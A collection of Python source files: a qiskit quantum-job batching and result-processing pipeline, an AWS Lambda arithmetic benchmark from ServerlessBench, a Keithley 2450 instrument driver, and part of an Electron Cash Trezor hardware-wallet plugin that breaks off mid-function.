batch = self._create_new_batch(backend_name)
except KeyError:
batch = Batch(backend_name, self._backend_look_up.max_shots(backend_name), self._backend_look_up.max_experiments(backend_name), 0)
self._batches[backend_name] = batch
self._batch_count[backend_name] = 0
return batch
def _create_new_batch(self, backend_name:str):
self._batch_count[backend_name] += 1
batch = Batch(backend_name, self._backend_look_up.max_shots(backend_name), self._backend_look_up.max_experiments(backend_name), self._batch_count[backend_name])
self._batches[backend_name] = batch
return batch
def _add_to_batch(self, transpiled_circuit:QuantumCircuit, job:QuantumExecutionJob):
"""Add the circuit to the batch. Automatically forwards full batches and creates new batches.
Args:
transpiled_circuit (QuantumCircuit)
job (QuantumExecutionJob): corresponding job to the transpiled circuit containing the shot number and the backend
"""
backend_name = job.backend_data.name
if not backend_name in self._batch_timers.keys():
self._batch_timers[backend_name] = time.time()
key = job.id
remaining_shots = job.shots
while remaining_shots > 0:
batch = self._get_or_create_batch(backend_name)
remaining_shots = batch.add_circuit(key, transpiled_circuit, remaining_shots)
if batch.remaining_experiments == 0:
self._log.info(f"Generated full batch {backend_name}/{self._batch_count[backend_name]}")
self._output.put(batch)
if remaining_shots > 0:
self._batch_timers[backend_name] = time.time()
else:
self._batch_timers.pop(backend_name)
def _check_timers(self):
"""Checks if an timeout occured for a batch and then forward it.
"""
timers_to_clear = []
for backend_name in self._batch_timers.keys():
time_diff = time.time() - self._batch_timers[backend_name]
if time_diff > self._batch_timeout:
batch = self._batches[backend_name]
self._log.debug(f"Timeout for batch {backend_name}/{self._batch_count[backend_name]}, Time passed: {time_diff}, batch_size:{batch.max_experiments - batch.remaining_experiments}, max batch size {batch.max_experiments}")
self._output.put(batch)
self._create_new_batch(backend_name)
timers_to_clear.append(backend_name)
for backend_name in timers_to_clear:
self._batch_timers.pop(backend_name)
def run(self) -> None:
self._log.info("Started")
while True:
try:
transpiled_circ, job = self._input.get(timeout=5)
self._quantum_job_table[job.id] = job
self._add_to_batch(transpiled_circ, job)
except Empty:
pass
self._check_timers()
class Submitter(Thread):
def __init__(self, input: Queue, output: Queue, backend_look_up:BackendLookUp, backend_control:BackendControl, defer_interval=60):
self._log = logger.get_logger(type(self).__name__)
self._input = input
self._output = output
self._backend_look_up = backend_look_up
self._backend_control = backend_control
self._defer_interval = defer_interval
self._internal_jobs_queue = []
Thread.__init__(self)
self._log.info("Init")
def _assemble(self, batch:Batch) -> Qobj:
"""Assemble a Qobj from a Batch.
Args:
batch (Batch)
Returns:
Qobj
"""
backend_name = batch.backend_name
backend = self._backend_look_up.get(backend_name)
circuits = list([circuit_item["circuit"] for circuit_item in batch.experiments])
multiplied_circuits = []
for i, circuit_item in enumerate(batch.experiments):
reps = circuit_item["reps"]
circ = circuits[i]
multiplied_circuits.extend([circ]*reps)
#self._log.info(f"Transpiled batch {backend_name}/{batch.batch_number}")
qobj = assemble(multiplied_circuits, backend, shots=batch.shots, memory=True)
self._log.info(f"Assembled Qobj for batch {backend_name}/{batch.batch_number}")
return qobj
def run(self) -> None:
self._log.info("Started")
batch: Batch
qobj: Qobj
submit_interval = 30
last_time = 0
while True:
try:
batch = self._input.get(timeout=self._defer_interval)
qobj = self._assemble(batch)
self._internal_jobs_queue.append((batch, qobj))
except Empty:
pass
current = time.time()
if current - last_time > submit_interval:
deferred_jobs = []
for batch, qobj in self._internal_jobs_queue:
backend_name = batch.backend_name
backend = self._backend_look_up.get(backend_name)
if self._backend_control.try_to_enter(backend_name, backend):
job = backend.run(qobj)
self._log.info(f"Submitted batch {batch.backend_name}/{batch.batch_number}")
self._output.put((batch, job))
else:
# self._log.debug(f"Reached limit of queued jobs for backend {backend_name} -> defer job for batch {batch.batch_number}")
deferred_jobs.append((batch, qobj))
self._internal_jobs_queue = deferred_jobs
last_time = time.time()
class Retriever(Thread):
def __init__(self, input: Queue, output: Queue, wait_time:float, backend_control:BackendControl):
self._log = logger.get_logger(type(self).__name__)
self._input = input
self._output = output
self._wait_time = wait_time
self._backend_control = backend_control
self._jobs = []
self._batch_counter = {}
self._deferred_results = {}
Thread.__init__(self)
self._log.info("Init")
def run(self):
self._log.info("Started")
batch: Batch
job: Job
while True:
i = 0
while not self._input.empty() and i < 5:
job_tuple = self._input.get()
self._jobs.append(job_tuple)
i += 1
final_state_jobs = []
for batch, job in self._jobs:
try:
if job.in_final_state():
final_state_jobs.append((batch, job))
self._backend_control.leave(batch.backend_name)
except qiskit.providers.ibmq.job.exceptions.IBMQJobApiError as e:
self._log.info("Connection Problem")
for job_tuple in final_state_jobs:
self._jobs.remove(job_tuple)
batch, job = job_tuple
self._log.info(f"Received result for batch {batch.backend_name}/{batch.batch_number}")
try:
batch_counter = self._batch_counter[batch.backend_name]
except KeyError:
batch_counter = 0
self._batch_counter[batch.backend_name] = 0
self._deferred_results[batch.backend_name] = []
if batch_counter == batch.batch_number:
# the received batch is the next batch -> output it
batch_counter += 1
self._output.put(job_tuple)
# check if deferred results can be output
if len(self._deferred_results[batch.backend_name]) > 0:
# sort the deferred job tuples according to their batch number
self._deferred_results[batch.backend_name].sort(key=lambda tuple:tuple[0].batch_number)
while len(self._deferred_results[batch.backend_name]) > 0 and batch_counter == self._deferred_results[batch.backend_name][0][0].batch_number:
# ouput jobs as long as their are deferred jobs and the batch number is next following number
self._output.put(self._deferred_results[batch.backend_name].pop(0))
batch_counter += 1
self._batch_counter[batch.backend_name] = batch_counter
else:
# the received batch is not the next batch
self._deferred_results[batch.backend_name].append(job_tuple)
self._log.info(f"Deferred result for batch {batch.backend_name}/{batch.batch_number} to establish order")
time.sleep(self._wait_time)
class ResultProcessor(Thread):
def __init__(self, input: Queue, output: Queue, quantum_job_table:Dict, memory:bool=False):
self._log = logger.get_logger(type(self).__name__)
self._input = input
self._output = output
self._quantum_job_table = quantum_job_table
self._memory = memory
self._previous_key = {}
self._previous_memory = {}
self._previous_counts = {}
Thread.__init__(self)
self._log.info("Init")
def _add_dicts(self, d1, d2):
c = Counter(d1)
c.update(d2)
return dict(c)
def _process_job_result(self, job_result:Result, batch:Batch) -> Dict[str, Result]:
"""Post-process the job result corresponding to a batch. Recreate the single results by adding up the shots of multiple executions
Args:
job_result (Result)
batch (Batch): corresponding batch to the job_result
Returns:
Dict[str, Result]: Maps the keys of the initial QuantumExecutionJobs to their Results
"""
results = {}
exp_number = 0
# get the Result as dict and delete the results
result_dict = job_result.to_dict()
index = batch.batch_number
backend_name = batch.backend_name
try:
previous_key = self._previous_key[backend_name]
previous_memory = self._previous_memory[backend_name]
previous_counts = self._previous_counts[backend_name]
except KeyError:
previous_key = None
previous_memory = None
previous_counts = None
self._log.info(f"Process result of job {index}")
for exp in batch.experiments:
key = exp["key"]
circ = exp["circuit"]
reps = exp["reps"]
shots = exp["shots"]
total_shots = exp["total_shots"]
memory = []
counts = {}
result_data = None
if previous_memory:
# there is data from the previous job
assert(previous_key==key)
memory.extend(previous_memory)
counts.update(previous_counts)
shots += len(previous_memory)
total_shots += len(previous_memory)
previous_memory = None
previous_counts = None
previous_key = None
# get ExperimentResult as dict
job_exp_result_dict = job_result._get_experiment(exp_number).to_dict()
if not (shots == total_shots and reps == 1 and len(memory) == 0):
# do not run this block if it is only one experiment (shots == total_shots) with one repetition and no previous data is available
for exp_index in range(exp_number, exp_number+reps):
mem = job_result.data(exp_index)['memory']
memory.extend(mem)
cnts = job_result.data(exp_index)['counts']
if exp_index == exp_number+reps-1 and shots == total_shots:
# last experiment for this circuit
if len(memory) > total_shots:
# trim memory and counts w.r.t. number of shots
too_much = len(memory) - total_shots
memory = memory[:total_shots]
mem = mem[:-too_much]
cnts = dict(Counter(mem))
counts = self._add_dicts(counts, cnts)
if shots < total_shots:
previous_memory = copy.deepcopy(memory)
previous_counts = copy.deepcopy(counts)
previous_key = key
continue
if self._memory:
result_data = ExperimentResultData(counts=counts, memory=memory).to_dict()
else:
result_data = ExperimentResultData(counts=counts).to_dict()
# overwrite the data and the shots
job_exp_result_dict["data"] = result_data
job_exp_result_dict["shots"] = total_shots
else:
if not self._memory:
counts = job_result.data(exp_number)['counts']
result_data = ExperimentResultData(counts=counts).to_dict()
job_exp_result_dict["data"] = result_data
# overwrite the results with the computed result
result_dict["results"] = [job_exp_result_dict]
results[key] = Result.from_dict(result_dict)
exp_number += reps
self._previous_key[backend_name] = previous_key
self._previous_memory[backend_name] = previous_memory
self._previous_counts[backend_name] = previous_counts
return results
def run(self) -> None:
self._log.info("Started")
batch: Batch
job: Job
while True:
batch, job = self._input.get()
job_result = job.result()
self._log.info(f"Got result for batch {batch.batch_number} from {batch.backend_name}")
result_for_batch = self._process_job_result(job_result, batch)
for key, result in result_for_batch.items():
try:
qjob = self._quantum_job_table.pop(key)
qjob.result = result
self._output.put(qjob)
except KeyError as ke:
# TODO Exception Handling
raise ke
class ExecutionHandler():
def __init__(self, provider:AccountProvider, input:Queue, output:Queue, batch_timeout:int = 60, retrieve_interval:int = 30, transpile_timeout=20, max_transpile_batch_size=float('inf'), submitter_defer_interval=30, provide_memory:bool=False) -> None:
transpiler_batcher = Queue()
batcher_submitter = Queue()
submitter_retrieber = Queue()
retriever_processor = Queue()
quantum_job_table = {}
backend_look_up = BackendLookUp(provider)
backend_control = BackendControl()
self._transpiler = Transpiler(input=input, output=transpiler_batcher, backend_look_up=backend_look_up, timeout = transpile_timeout, max_transpile_batch_size=max_transpile_batch_size)
self._batcher = Batcher(input=transpiler_batcher, output=batcher_submitter, quantum_job_table=quantum_job_table, backend_look_up=backend_look_up, batch_timeout=batch_timeout)
self._submitter = Submitter(input=batcher_submitter, output=submitter_retrieber, backend_look_up=backend_look_up, backend_control=backend_control, defer_interval=submitter_defer_interval)
self._retriever = Retriever(input=submitter_retrieber, output=retriever_processor, wait_time=retrieve_interval, backend_control=backend_control)
self._processor = ResultProcessor(input=retriever_processor, output=output, quantum_job_table=quantum_job_table, memory=provide_memory)
def start(self):
self._transpiler.start()
self._batcher.start()
self._submitter.start()
self._retriever.start()
self._processor.start()
|
together.py
|
# Copyright (c) 2020 Institution of Parallel and Distributed System, Shanghai Jiao Tong University
# ServerlessBench is licensed under the Mulan PSL v1.
# You can use this software according to the terms and conditions of the Mulan PSL v1.
# You may obtain a copy of Mulan PSL v1 at:
# http://license.coscl.org.cn/MulanPSL
# THIS SOFTWARE IS PROVIDED ON AN "AS IS" BASIS, WITHOUT WARRANTIES OF ANY KIND, EITHER EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO NON-INFRINGEMENT, MERCHANTABILITY OR FIT FOR A PARTICULAR
# PURPOSE.
# See the Mulan PSL v1 for more details.
import boto3
import time
import os
import random
from multiprocessing import Process, Pipe
bucketName = "resource-efficient"
defaultKey = "loopTime.txt"
defaultLoopTime = 10000000
defaultParallelIndex = 100
def lambda_handler(event, context):
startTime = GetTime()
if 'key' in event:
key = event['key']
else:
key = defaultKey
download_file(key)
loopTime = extractLoopTime(key)
retTime = GetTime()
result1 = {
"startTime": startTime,
"retTime": retTime,
"execTime": retTime - startTime,
"loopTime": loopTime,
"key": key
}
return alu_handler(result1,"")
def download_file(key):
filepath = "/tmp/%s" %key
s3 = boto3.client('s3')
with open(filepath, 'wb+') as f:
s3.download_fileobj(bucketName, key, f)
def extractLoopTime(key):
filepath = "/tmp/%s" %key
txtfile = open(filepath, 'r')
loopTime = int(txtfile.readline())
print("loopTime: " + str(loopTime))
txtfile.close()
return loopTime
def alu_handler(event, context):
startTime = GetTime()
if 'execTime' in event:
execTime_prev = event['execTime']
else:
execTime_prev = 0
if 'loopTime' in event:
loopTime = event['loopTime']
else:
loopTime = defaultLoopTime
parallelIndex = defaultParallelIndex
temp = alu(loopTime, parallelIndex)
retTime = GetTime()
return {
"startTime": startTime,
"retTime": retTime,
"execTime": retTime - startTime,
"result": temp,
'execTime_prev': execTime_prev
}
def doAlu(times, childConn, clientId):
a = random.randint(10, 100)
b = random.randint(10, 100)
temp = 0
for i in range(times):
if i % 4 == 0:
temp = a + b
elif i % 4 == 1:
temp = a - b
elif i % 4 == 2:
temp = a * b
else:
temp = a / b
print(times)
childConn.send(temp)
childConn.close()
return temp
def alu(times, parallelIndex):
per_times = int(times / parallelIndex)
threads = []
childConns = []
parentConns = []
for i in range(parallelIndex):
parentConn, childConn = Pipe()
parentConns.append(parentConn)
childConns.append(childConn)
t = Process(target=doAlu, args=(per_times, childConn, i))
threads.append(t)
for i in range(parallelIndex):
threads[i].start()
for i in range(parallelIndex):
threads[i].join()
results = []
for i in range(parallelIndex):
results.append(parentConns[i].recv())
return str(results)
def GetTime():
return int(round(time.time() * 1000))
|
Keithley2450.py
|
from math import copysign
from threading import Thread
from time import sleep
from typing import List, Tuple
import pyvisa
from IVTracerVlockin import BiasGenerator
class Driver:
"""Keithley 2450 as bias generator."""
def __init__(self, address):
self._rm = rm = pyvisa.ResourceManager()
self._rsc = rsc = rm.open_resource(
address, write_termination="\n", read_termination="\n"
)
self._ramps = []
if rsc.query(":SOUR:FUNC?") != "VOLT":
raise RuntimeError(f"Keithley 2450 ({address}) is not in voltage mode.")
if rsc.query(":OUTP?") != "1":
raise RuntimeError(f"Keithley 2450 ({address}) output is off.")
self._worker_thread = None
def close(self):
self._rsc.close()
def select_range(self, value, load_resistance):
if value < 21e-3:
r = 20e-3
elif value < 210e-3:
r = 200e-3
elif value < 2.1:
r = 2
elif value < 21:
r = 20
elif value < 210:
r = 200
else:
raise ValueError(f"No admissible range for {value}")
resp = self._rsc.query(f":SOUR:VOLT:RANG {r};:SOUR:VOLT:RANG?")
if float(resp) != r:
raise RuntimeError(
f"Failed to set range (after setting value is {resp}," f"expected {r}"
)
curr_limit = round(1.1 * r / load_resistance, 6)
resp = self._rsc.query(
f":SENS:CURR:RANG:AUTO 1;:SOUR:VOLT:ILIMIT {curr_limit};:SOUR:VOLT:ILIMIT?"
)
if float(resp) != curr_limit:
raise RuntimeError(
f"Failed to set current limit (after setting value is {resp},"
f"expected {curr_limit}"
)
def current_value(self):
"""Get the current value of the output."""
return float(self._rsc.query(":SOUR:VOLT?"))
def goto_value(self, value, slope):
"""Go to the specified value immediately."""
rsc = self._rsc
curr_value = self.current_value()
step = slope * 0.05
step = copysign(step, value - curr_value)
if abs(value - curr_value) < step:
rsc.write(f":SOUR:VOLT {value}")
else:
self._worker_thread = Thread(target=self._go_to, args=(value, step))
self._worker_thread.start()
sleep(0.02)
def is_ramping(self):
"""Check is the program is done executing."""
if self._worker_thread is not None and self._worker_thread.is_alive():
return True
else:
return False
def get_admissible_reset_rate(self, reset_rate, amplitude):
"""Get an admissible reset rate.
This avoids issue for too fast reset for the system to handle.
"""
return reset_rate
@classmethod
def support_continuous_sweeping(self) -> bool:
""""""
return False
def _go_to(self, value, step):
rsc = self._rsc
cval = self.current_value()
while abs(value - cval) > abs(step):
rsc.write(f":SOUR:VOLT {cval + step}")
sleep(0.05)
cval = self.current_value()
rsc.write(f":SOUR:VOLT {value}")
# Can used for debugging by commenting the import of BiasSource
# if __name__ == "__main__":
# y = Driver("GPIB::13::INSTR")
# try:
# print(y.is_ramping())
# y.goto_value(-1, 10)
# finally:
# y.close()
|
trezor.py
|
from binascii import hexlify, unhexlify
from collections import defaultdict
import traceback
import sys
from electroncash.util import bfh, bh2u, versiontuple, UserCancelled
from electroncash.bitcoin import (b58_address_to_hash160, xpub_from_pubkey, deserialize_xpub,
TYPE_ADDRESS, TYPE_SCRIPT, SignatureType)
from electroncash.i18n import _
from electroncash.networks import NetworkConstants
from electroncash.plugins import BasePlugin, Device
from electroncash.transaction import deserialize
from electroncash.keystore import Hardware_KeyStore, is_xpubkey, parse_xpubkey
from electroncash.address import ScriptOutput
from ..hw_wallet import HW_PluginBase
try:
import trezorlib
import trezorlib.transport
from .clientbase import (TrezorClientBase, parse_path)
from trezorlib.messages import (
RecoveryDeviceType, HDNodeType, HDNodePathType,
InputScriptType, OutputScriptType, MultisigRedeemScriptType,
TxInputType, TxOutputType, TxOutputBinType, TransactionType, SignTx)
RECOVERY_TYPE_SCRAMBLED_WORDS = RecoveryDeviceType.ScrambledWords
RECOVERY_TYPE_MATRIX = RecoveryDeviceType.Matrix
from trezorlib.client import PASSPHRASE_ON_DEVICE
TREZORLIB = True
except Exception as e:
import traceback
traceback.print_exc()
TREZORLIB = False
RECOVERY_TYPE_SCRAMBLED_WORDS, RECOVERY_TYPE_MATRIX = range(2)
PASSPHRASE_ON_DEVICE = object()
# TREZOR initialization methods
TIM_NEW, TIM_RECOVER = range(2)
TREZOR_PRODUCT_KEY = 'Trezor'
class TrezorKeyStore(Hardware_KeyStore):
hw_type = 'trezor'
device = TREZOR_PRODUCT_KEY
def get_derivation(self):
return self.derivation
def get_client(self, force_pair=True):
return self.plugin.get_client(self, force_pair)
def decrypt_message(self, sequence, message, password):
raise RuntimeError(_('Encryption and decryption are not implemented by {}').format(self.device))
def sign_message(self, sequence, message, password, sigtype=SignatureType.BITCOIN):
if sigtype == SignatureType.ECASH:
raise RuntimeError(
_('eCash message signing is not available for {}').format(self.device)
)
client = self.get_client()
address_path = self.get_derivation() + "/%d/%d"%sequence
msg_sig = client.sign_message(address_path, message)
return msg_sig.signature
def sign_transaction(self, tx, password, *, use_cache=False):
if tx.is_complete():
return
# previous transactions used as inputs
prev_tx = {}
# path of the xpubs that are involved
xpub_path = {}
for txin in tx.inputs():
pubkeys, x_pubkeys = tx.get_sorted_pubkeys(txin)
tx_hash = txin['prevout_hash']
if txin.get('prev_tx') is None:
raise RuntimeError(_('Offline signing with {} is not supported.').format(self.device))
prev_tx[tx_hash] = txin['prev_tx']
for x_pubkey in x_pubkeys:
if not is_xpubkey(x_pubkey):
continue
xpub, s = parse_xpubkey(x_pubkey)
if xpub == self.get_master_public_key():
xpub_path[xpub] = self.get_derivation()
self.plugin.sign_transaction(self, tx, prev_tx, xpub_path)
def needs_prevtx(self):
# Trezor does need previous transactions for Bitcoin Cash
return True
class LibraryFoundButUnusable(Exception):
def __init__(self, library_version='unknown'):
self.library_version = library_version
class TrezorPlugin(HW_PluginBase):
# Derived classes provide:
#
# class-static variables: client_class, firmware_URL, handler_class,
# libraries_available, libraries_URL, minimum_firmware,
# wallet_class, types
firmware_URL = 'https://wallet.trezor.io'
libraries_URL = 'https://pypi.org/project/trezor/'
minimum_firmware = (1, 5, 2)
keystore_class = TrezorKeyStore
minimum_library = (0, 12, 0)
maximum_library = (0, 13)
DEVICE_IDS = (TREZOR_PRODUCT_KEY,)
MAX_LABEL_LEN = 32
def __init__(self, parent, config, name):
super().__init__(parent, config, name)
self.libraries_available = self.check_libraries_available()
if not self.libraries_available:
return
self.device_manager().register_enumerate_func(self.enumerate)
def check_libraries_available(self) -> bool:
def version_str(t):
return ".".join(str(i) for i in t)
try:
# this might raise ImportError or LibraryFoundButUnusable
library_version = self.get_library_version()
# if no exception so far, we might still raise LibraryFoundButUnusable
if (library_version == 'unknown'
or versiontuple(library_version) < self.minimum_library
or hasattr(self, "maximum_library") and versiontuple(library_version) >= self.maximum_library):
raise LibraryFoundButUnusable(library_version=library_version)
except ImportError:
return False
except LibraryFoundButUnusable as e:
library_version = e.library_version
max_version_str = version_str(self.maximum_library) if hasattr(self, "maximum_library") else "inf"
self.libraries_available_message = (
_("Library version for '{}' is incompatible.").format(self.name)
+ '\nInstalled: {}, Needed: {} <= x < {}'
.format(library_version, version_str(self.minimum_library), max_version_str))
self.print_stderr(self.libraries_available_message)
return False
return True
def get_library_version(self):
import trezorlib
try:
version = trezorlib.__version__
except Exception:
version = 'unknown'
if TREZORLIB:
return version
else:
raise LibraryFoundButUnusable(library_version=version)
def enumerate(self):
devices = trezorlib.transport.enumerate_devices()
return [Device(path=d.get_path(),
interface_number=-1,
id_=d.get_path(),
product_key=TREZOR_PRODUCT_KEY,
usage_page=0)
for d in devices]
def create_client(self, device, handler):
try:
self.print_error("connecting to device at", device.path)
transport = trezorlib.transport.get_transport(device.path)
except BaseException as e:
self.print_error("cannot connect at", device.path, str(e))
return None
if not transport:
self.print_error("cannot connect at", device.path)
return
self.print_error("connected to device at", device.path)
return TrezorClientBase(transport, handler, self)
def get_client(self, keystore, force_pair=True):
devmgr = self.device_manager()
handler = keystore.handler
client = devmgr.client_for_keystore(self, handler, keystore, force_pair)
# returns the client for a given keystore. can use xpub
if client:
client.used()
return client
def get_coin_name(self):
# Note: testnet supported only by unofficial firmware
return "Bcash Testnet" if NetworkConstants.TESTNET else "Bcash"
def _chk_settings_do_popup_maybe(self, handler, method, model, settings):
recovery_type = settings and settings[-1]
if (method == TIM_RECOVER
and recovery_type == RECOVERY_TYPE_SCRAMBLED_WORDS
and model != 'T'): # I'm pretty sure this only applies to the '1' not the 'T'
handler.show_error(_(
"You will be asked to enter 24 words regardless of your "
"seed's actual length. If you enter a word incorrectly or "
"misspell it, you cannot change it or go back - you will need "
"to start again from the beginning.\n\nSo please enter "
"the words carefully!"))
def initialize_device(self, device_id, wizard, handler):
# Initialization method
msg = _("Choose how you want to initialize your {}.\n\n"
"Either method is secure since no secret information "
"will be entered into your computer."
).format(self.device)
choices = [
# Must be short as Qt doesn't word-wrap radio button text
(TIM_NEW, _("Let the device generate a completely new seed randomly")),
(TIM_RECOVER, _("Recover from a seed you have previously written down")),
]
devmgr = self.device_manager()
client = devmgr.client_by_id(device_id)
model = client.get_trezor_model()
def f(method):
loops = [wizard.loop] # We do it this way so as to pop the loop when it's done. This avoids possible multiple calls to loop.exit from different code paths.
handler._loops = loops # hack to prevent trezor transport errors from stalling the UI here. see clientbase.py button_request which aborts the wizard event loop on transport error
try:
import threading
settings = self.request_trezor_init_settings(wizard, method, model)
# We do this popup business here because doing it in the
# thread interferes with whatever other popups may happen
# from trezorlib. So we do this all-stop popup first if needed.
self._chk_settings_do_popup_maybe(handler, method, model, settings)
errors = []
t = threading.Thread(target=self._initialize_device_safe, args=(settings, method, device_id, loops, errors))
t.setDaemon(True)
t.start()
exit_code = wizard.loop.exec_()
loops.pop()
if exit_code != 0:
if errors and isinstance(errors[0], BaseException):
msg = str(errors[0]).strip()
if msg:
# we do this here in the main thread so as to give
# the user the opportunity to actually *see* the error
# window before the wizard "goes back"
handler.show_error(msg)
# this method (initialize_device) was called with the expectation
# of leaving the device in an initialized state when finishing.
# signal that this is not the case:
raise UserCancelled()
finally:
delattr(handler, '_loops') # /clean up hack
wizard.choice_dialog(title=_('Initialize Device'), message=msg, choices=choices, run_next=f)
def _initialize_device_safe(self, settings, method, device_id, loops, errors):
exit_code = 0
try:
self._initialize_device(settings, method, device_id)
except UserCancelled:
exit_code = 2
except BaseException as e:
traceback.print_exc(file=sys.stderr)
errors.append(e)
exit_code = 1
finally:
l = loops.copy() # leverage the GIL here for thread safety.
if l:
l[0].exit(exit_code)
def _initialize_device(self, settings, method, device_id):
item, label, pin_protection, passphrase_protection, recovery_type = settings
devmgr = self.device_manager()
client = devmgr.client_by_id(device_id)
if method == TIM_NEW:
client.reset_device(
strength=64 * (item + 2), # 128, 192 or 256
passphrase_protection=passphrase_protection,
pin_protection=pin_protection,
label=label)
elif method == TIM_RECOVER:
client.recover_device(
recovery_type=recovery_type,
word_count=6 * (item + 2), # 12, 18 or 24
passphrase_protection=passphrase_protection,
pin_protection=pin_protection,
label=label)
else:
raise RuntimeError("Unsupported recovery method")
def _make_node_path(self, xpub, address_n):
_, depth, fingerprint, child_num, chain_code, key = deserialize_xpub(xpub)
node = HDNodeType(
depth=depth,
fingerprint=int.from_bytes(fingerprint, 'big'),
child_num=int.from_bytes(child_num, 'big'),
chain_code=chain_code,
public_key=key,
)
return HDNodePathType(node=node, address_n=address_n)
def setup_device(self, device_info, wizard, purpose):
'''Called when creating a new wallet. Select the device to use. If
the device is uninitialized, go through the intialization
process.'''
device_id = device_info.device.id_
client = self.scan_and_create_client_for_device(
device_id=device_id, wizard=wizard
)
if not client.is_uptodate():
raise Exception(_('Outdated {} firmware for device labelled {}. Please '
'download the updated firmware from {}')
.format(self.device, client.label(), self.firmware_URL))
creating = not device_info.initialized
if creating:
self.initialize_device(device_id, wizard, client.handler)
wizard.run_task_without_blocking_gui(
task=lambda: client.get_xpub('m', 'standard', creating))
client.used()
return client
def get_xpub(self, device_id, derivation, xtype, wizard):
client = self.scan_and_create_client_for_device(
device_id=device_id, wizard=wizard
)
xpub = client.get_xpub(derivation, xtype)
client.used()
return xpub
def get_trezor_input_script_type(self, is_multisig):
if is_multisig:
return InputScriptType.SPENDMULTISIG
else:
return InputScriptType.SPENDADDRESS
def sign_transaction(self, keystore, tx, prev_tx, xpub_path):
prev_tx = { bfh(txhash): self.electrum_tx_to_txtype(tx, xpub_path) for txhash, tx in prev_tx.items() }
client = self.get_client(keystore)
inputs = self.tx_inputs(tx, xpub_path, True)
outputs = self.tx_outputs(keystore.get_derivation(), tx, client)
details = SignTx(lock_time=tx.locktime)
signatures, signed_tx = client.sign_tx(self.get_coin_name(), inputs, outputs, details=details, prev_txes=prev_tx)
signatures = [bh2u(x) for x in signatures]
tx.update_signatures(signatures)
def show_address(self, wallet, address, keystore=None):
if keystore is None:
keystore = wallet.get_keystore()
deriv_suffix = wallet.get_address_index(address)
derivation = keystore.derivation
address_path = "%s/%d/%d"%(derivation, *deriv_suffix)
# prepare multisig, if available
xpubs = wallet.get_master_public_keys()
if len(xpubs) > 1:
pubkeys = wallet.get_public_keys(address)
# sort xpubs using the order of pubkeys
sorted_pairs = sorted(zip(pubkeys, xpubs))
multisig = self._make_multisig(
wallet.m,
[(xpub, deriv_suffix) for _, xpub in sorted_pairs])
else:
multisig = None
script_type = self.get_trezor_input_script_type(multisig is not None)
client = self.get_client(keystore)
client.show_address(address_path, script_type, multisig)
def tx_inputs(self, tx, xpub_path, for_sig=False):
inputs = []
for txin in tx.inputs():
txinputtype = TxInputType()
if txin['type'] == 'coinbase':
prev_hash = b"\0"*32
prev_index = 0xffffffff # signed int -1
else:
if for_sig:
x_pubkeys = txin['x_pubkeys']
xpubs = [parse_xpubkey(x) for x in x_pubkeys]
multisig = self._make_multisig(txin.get('num_sig'), xpubs, txin.get('signatures'))
script_type = self.get_trezor_input_script_type(multisig is not None)
txinputtype = TxInputType(
script_type=script_type,
multisig=multisig)
# find which key is mine
for xpub, deriv in xpubs:
if xpub in xpub_path:
xpub_n = parse_path(xpub_path[xpub])
txinputtype.address_n = xpub_n + deriv
break
prev_hash = unhexlify(txin['prevout_hash'])
prev_index = txin['prevout_n']
if 'value' in txin:
txinputtype.amount = txin['value']
txinputtype.prev_hash = prev_hash
txinputtype.prev_index = prev_index
if 'scriptSig' in txin:
script_sig = bfh(txin['scriptSig'])
txinputtype.script_sig = script_sig
txinputtype.sequence = txin.get('sequence', 0xffffffff - 1)
inputs.append(txinputtype)
return inputs
def _make_multisig(self, m, xpubs, signatures=None):
if len(xpubs) == 1:
return None
pubkeys = [self._make_node_path(xpub, deriv) for xpub, deriv in xpubs]
if signatures is None:
signatures = [b''] * len(pubkeys)
elif len(signatures) != len(pubkeys):
raise RuntimeError('Mismatched number of signatures')
else:
signatures = [bfh(x)[:-1] if x else b'' for x in signatures]
return MultisigRedeemScriptType(
pubkeys=pubkeys,
signatures=signatures,
m=m)
def tx_outputs(self, derivation, tx, client):
def create_output_by_derivation():
deriv = parse_path("/%d/%d" % index)
multisig = self._make_multisig(m, [(xpub, deriv) for xpub in xpubs])
script_type = OutputScriptType.PAYTOADDRESS if multisig is None else OutputScriptType.PAYTOMULTISIG
txoutputtype = TxOutputType(
multisig=multisig,
amount=amount,
address_n=parse_path(derivation + "/%d/%d" % index),
script_type=script_type)
return txoutputtype
def create_output_by_address():
txoutputtype = TxOutputType()
txoutputtype.amount = amount
if _type == TYPE_SCRIPT:
script = address.to_script()
# We only support OP_RETURN with one constant push
if (script[0] == 0x6a and amount == 0 and
script[1] == len(script) - 2 and
script[1] <= 75):
txoutputtype.script_type = OutputScriptType.PAYTOOPRETURN
txoutputtype.op_return_data = script[2:]
else:
raise Exception(_("Unsupported output script."))
elif _type == TYPE_ADDRESS:
txoutputtype.script_type = OutputScriptType.PAYTOADDRESS
# ecash: addresses are not supported yet by trezor
ui_addr_fmt = address.FMT_UI
if ui_addr_fmt == address.FMT_CASHADDR:
ui_addr_fmt = address.FMT_CASHADDR_BCH
addr_format = address.FMT_LEGACY
if client.get_trezor_model() == 'T':
if client.atleast_version(2, 0, 8):
addr_format = ui_addr_fmt
elif client.atleast_version(2, 0, 7):
addr_format = address.FMT_CASHADDR_BCH
else:
if client.atleast_version(1, 6, 2):
addr_format = ui_addr_fmt
txoutputtype.address = address.to_full_string(addr_format)
return txoutputtype
outputs = []
has_change = False
any_output_on_change_branch = self.is_any_tx_output_on_change_branch(tx)
for _type, address, amount in tx.outputs():
use_create_by_derivation = False
info = tx.output_info.get(address)
if info is not None and not has_change:
index, xpubs, m, script_type = info
on_change_branch = index[0] == 1
# prioritise hiding outputs on the 'change' branch from user
# because no more than one change address allowed
# note: ^ restriction can be removed once we require fw
# that has https://github.com/trezor/trezor-mcu/pull/306
if on_change_branch == any_output_on_change_branch:
use_create_by_derivation = True
has_change = True
if use_create_by_derivation:
txoutputtype = create_output_by_derivation()
else:
txoutputtype = create_output_by_address()
outputs.append(txoutputtype)
return outputs
def is_any_tx_output_on_change_branch(self, tx):
if not tx.output_info:
return False
for _type, address, _amount in tx.outputs():
info = tx.output_info.get(address)
if info is not None and info[0][0] == 1:
return True
return False
# This function is called from the TREZOR libraries (via tx_api)
def get_tx(self, tx_hash):
# for electrum-abc previous tx is never needed, since it uses
# bip-143 signatures.
return None
def electrum_tx_to_txtype(self, tx, xpub_path):
t = TransactionType()
d = deserialize(tx.raw)
t.version = d['version']
t.lock_time = d['lockTime']
t.inputs = self.tx_inputs(tx, xpub_path)
t.bin_outputs = [
